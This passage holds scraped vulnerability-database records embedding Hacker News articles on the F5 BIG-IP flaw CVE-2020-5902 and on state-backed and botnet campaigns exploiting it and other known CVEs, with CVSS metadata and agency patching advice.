Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-21T12:02:00", "type": "thn", "title": "Hackers Target Ukrainian Software Company Using GoMet Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2022-1040"], "modified": "2022-07-22T03:26:54", "id": "THN:6D6F52F8E55C98F540525853C434FD08", "href": "https://thehackernews.com/2022/07/hackers-target-ukrainian-software.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:16", "description": "[](<https://thehackernews.com/images/-ESCkWH_hGFA/XwCORuHyklI/AAAAAAAA2_Y/8xaEkL1aRAsnYdpCaEIFxLgvuBwf2BtkQCLcBGAsYHQ/s728-e100/f5-big-ip-application-security.jpg>)\n\n \nCybersecurity researchers today issued a security advisory warning enterprises and governments across the globe to immediately patch a highly-critical remote code execution 
vulnerability affecting F5's BIG-IP networking devices running application security servers. \n \nThe vulnerability, assigned [CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) and rated as critical with a CVSS score of 10 out of 10, could let remote attackers take complete control of the targeted systems, eventually gaining surveillance over the application data they manage. \n \nAccording to Mikhail Klyuchnikov, a security researcher at Positive Technologies who discovered the flaw and reported it to F5 Networks, the issue resides in a configuration utility called Traffic Management User Interface (TMUI) for BIG-IP application delivery controller (ADC). \n \nBIG-IP ADC is being used by large enterprises, data centers, and cloud computing environments, allowing them to implement application acceleration, load balancing, rate shaping, SSL offloading, and web application firewall. \n \n\n\n## F5 BIG-IP ADC RCE Flaw (CVE-2020-5902)\n\n \nAn unauthenticated attacker can remotely exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration. \n \nSuccessful exploitation of this vulnerability could allow attackers to gain full admin control over the device, eventually making them do any task they want on the compromised device without any authorization. \n \n\n\n[](<https://thehackernews.com/images/-mSgD9hYm9iE/XwCPk5rodoI/AAAAAAAA2_k/Jk-64lba4o0OYBTI-vkgZlYW_MAMyckeQCLcBGAsYHQ/s728-e100/f5-big-ip-application.jpg>)\n\n \n\"The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,\" [Klyuchnikov said](<https://swarm.ptsecurity.com/rce-in-f5-big-ip/>). 
\n \n\"RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation.\" \n \nAs of June 2020, more than 8,000 devices have been identified online as being exposed directly to the internet, of which 40% reside in the United States, 16% in China, 3% in Taiwan, 2.5% in Canada and Indonesia and less than 1% in Russia, the security firm says. \n \nHowever, Klyuchnikov also says that most companies using the affected product do not expose the vulnerable configuration interface to the internet. \n \n\n\n## F5 BIG-IP ADC XSS Flaw (CVE-2020-5903)\n\n \nBesides this, Klyuchnikov also reported an XSS vulnerability (assigned [CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>) with a CVSS score of 7.5) in the BIG-IP configuration interface that could let remote attackers run malicious JavaScript code as the logged-in administrator user. \n \n\"If the user has administrator privileges and access to Advanced Shell (bash), successful exploitation can lead to a full compromise of BIG-IP via RCE,\" the researcher said. \n \n\n\n## Affected Versions and Patch Updates\n\n \nAffected companies and administrators relying on vulnerable BIG-IP versions 11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x are strongly recommended to update their devices to the latest versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4 as soon as possible. \n \nMoreover, users of public cloud marketplaces like AWS (Amazon Web Services), Azure, GCP, and Alibaba are also advised to switch to BIG-IP Virtual Edition (VE) versions 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.0.1.4, or 15.1.0.4, as soon as they are available. \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-04T14:20:00", "type": "thn", "title": "Critical RCE Flaw Affects F5 BIG-IP Application Security Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-15T18:43:21", "id": "THN:02088F21DB6E2D58FA2FBFDB5C735108", "href": "https://thehackernews.com/2020/07/f5-big-ip-application-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state 
actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposures ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerability Database (NVD), using the public disclosure of a vulnerability to select vulnerable targets. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), the [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and the [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in the F5 Networks BIG-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. 
\n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. 
\n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:41", "description": 
"[](<https://thehackernews.com/images/-fwDdPBvfngM/X9ibO88XoLI/AAAAAAAABQw/D13X0oYaee0IGytkuvamApgShATiHDPpACLcBGAsYHQ/s0/linux-botnet-malware.jpg>)\n\nA new wormable botnet that spreads via GitHub and Pastebin to install cryptocurrency miners and backdoors on target systems has returned with expanded capabilities to compromise web applications, IP cameras, and routers.\n\nEarly last month, researchers from Juniper Threat Labs documented a crypto-mining campaign called \"[Gitpaste-12](<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>),\" which used GitHub to host malicious code containing as many as 12 known attack modules that are executed via commands downloaded from a Pastebin URL.\n\nThe attacks occurred during a 12-day period starting from October 15, 2020, before both the Pastebin URL and repository were shut down on October 30, 2020.\n\nNow according to Juniper, the [second wave of attacks](<https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm>) began on November 10 using payloads from a different GitHub repository, which, among others, contains a Linux crypto-miner (\"ls\"), a file with a list of passwords for brute-force attempts (\"pass\"), and a local privilege escalation exploit for x86_64 Linux systems.\n\nThe initial infection happens via X10-unix, a binary written in Go programming language, that proceeds to download the next-stage payloads from GitHub.\n\n\"The worm conducts a wide-ranging series of attacks targeting web applications, IP cameras, routers and more, comprising at least 31 known vulnerabilities \u2014 seven of which were also seen in the previous Gitpaste-12 sample \u2014 as well as attempts to compromise open Android Debug Bridge connections and existing malware backdoors,\" Juniper researcher Asher Langton noted in a Monday 
analysis.\n\nIncluded in the list of 31 vulnerabilities are remote code execution flaws in the F5 BIG-IP Traffic Management User Interface (CVE-2020-5902), Pi-hole Web (CVE-2020-8816), Tenda AC15 AC1900 (CVE-2020-10987), and vBulletin (CVE-2020-17496), and an SQL injection bug in FUEL CMS (CVE-2020-17463), all of which came to light this year.\n\nIt's worth noting that [Ttint](<https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/>), a new variant of the Mirai botnet, was observed in October using two Tenda router zero-day vulnerabilities, including CVE-2020-10987, to spread a Remote Access Trojan (RAT) capable of carrying out denial-of-service attacks, executing malicious commands, and opening a reverse shell for remote access.\n\nAside from installing X10-unix and the Monero crypto mining software on the machine, the malware also opens a backdoor listening on ports 30004 and 30006, uploads the victim's external IP address to a private Pastebin paste, and attempts to connect to Android Debug Bridge connections on port 5555.\n\nOn a successful connection, it proceeds to download an Android APK file (\"weixin.apk\") that eventually installs an ARM CPU version of X10-unix.\n\nIn all, at least 100 distinct hosts have been spotted propagating the infection, per Juniper estimates.\n\nThe complete set of malicious binaries and other relevant Indicators of Compromise (IoCs) associated with the campaign can be accessed [here](<https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm>).\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-15T11:18:00", "type": "thn", "title": "Wormable Gitpaste-12 Botnet Returns to Target Linux Servers, IoT Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10987", "CVE-2020-17463", "CVE-2020-17496", "CVE-2020-5902", "CVE-2020-8816"], "modified": "2020-12-15T11:18:55", "id": "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "href": "https://thehackernews.com/2020/12/wormable-gitpaste-12-botnet-returns-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public 
disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. 
and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, including password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow, according to the NCSC, seven more vulnerabilities have been added to the mix, with the agency noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- 
Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", 
"CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:44", "description": "Amid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force attacks, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" is below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) 
(Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and 
the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": 
"Intelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private network (VPN), and cloud-based technologies, covering products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * 
